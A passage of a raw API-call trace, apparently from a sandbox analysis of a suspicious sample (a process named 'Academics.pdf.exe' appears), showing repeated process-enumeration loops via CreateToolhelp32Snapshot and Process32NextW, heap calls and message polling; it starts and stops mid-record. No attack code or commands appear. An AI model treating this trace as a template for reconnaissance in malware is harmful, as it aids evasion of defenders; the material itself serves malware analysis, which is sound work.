th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0311.585] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0311.586] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0311.586] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0311.587] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0311.588] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0311.589] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0311.590] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0311.590] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.591] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0311.592] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.593] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0311.593] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0311.594] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0311.595] CloseHandle (hObject=0x294) returned 1 [0311.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0311.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0311.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0311.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0311.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0311.595] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0311.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0311.596] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0311.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0311.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0311.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0311.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0311.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0311.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0311.596] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0311.598] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0311.599] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0311.599] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0311.600] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0311.601] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0311.602] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0311.603] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0311.603] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0311.604] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0311.605] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0311.606] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.607] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.607] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.608] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.609] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.610] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0311.611] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.611] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.612] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0311.613] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0311.614] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0311.615] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0311.615] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.616] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0311.617] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0311.618] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0311.619] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0311.619] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0311.620] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0311.621] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0311.622] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0311.623] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0311.623] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0311.624] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0311.625] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0311.626] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0311.627] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0311.628] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0311.628] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0311.629] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0311.630] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0311.631] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0311.632] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.633] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0311.633] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.634] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0311.635] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0311.636] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0311.637] CloseHandle (hObject=0x294) returned 1 [0311.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0311.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0311.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0311.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0311.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0311.637] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0311.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0311.637] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0311.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0311.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0311.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0311.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0311.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0311.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0311.637] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0311.639] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0311.640] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0311.641] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0311.642] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0311.643] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0311.644] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0311.644] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0311.645] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0311.646] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0311.647] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0311.648] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.648] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: 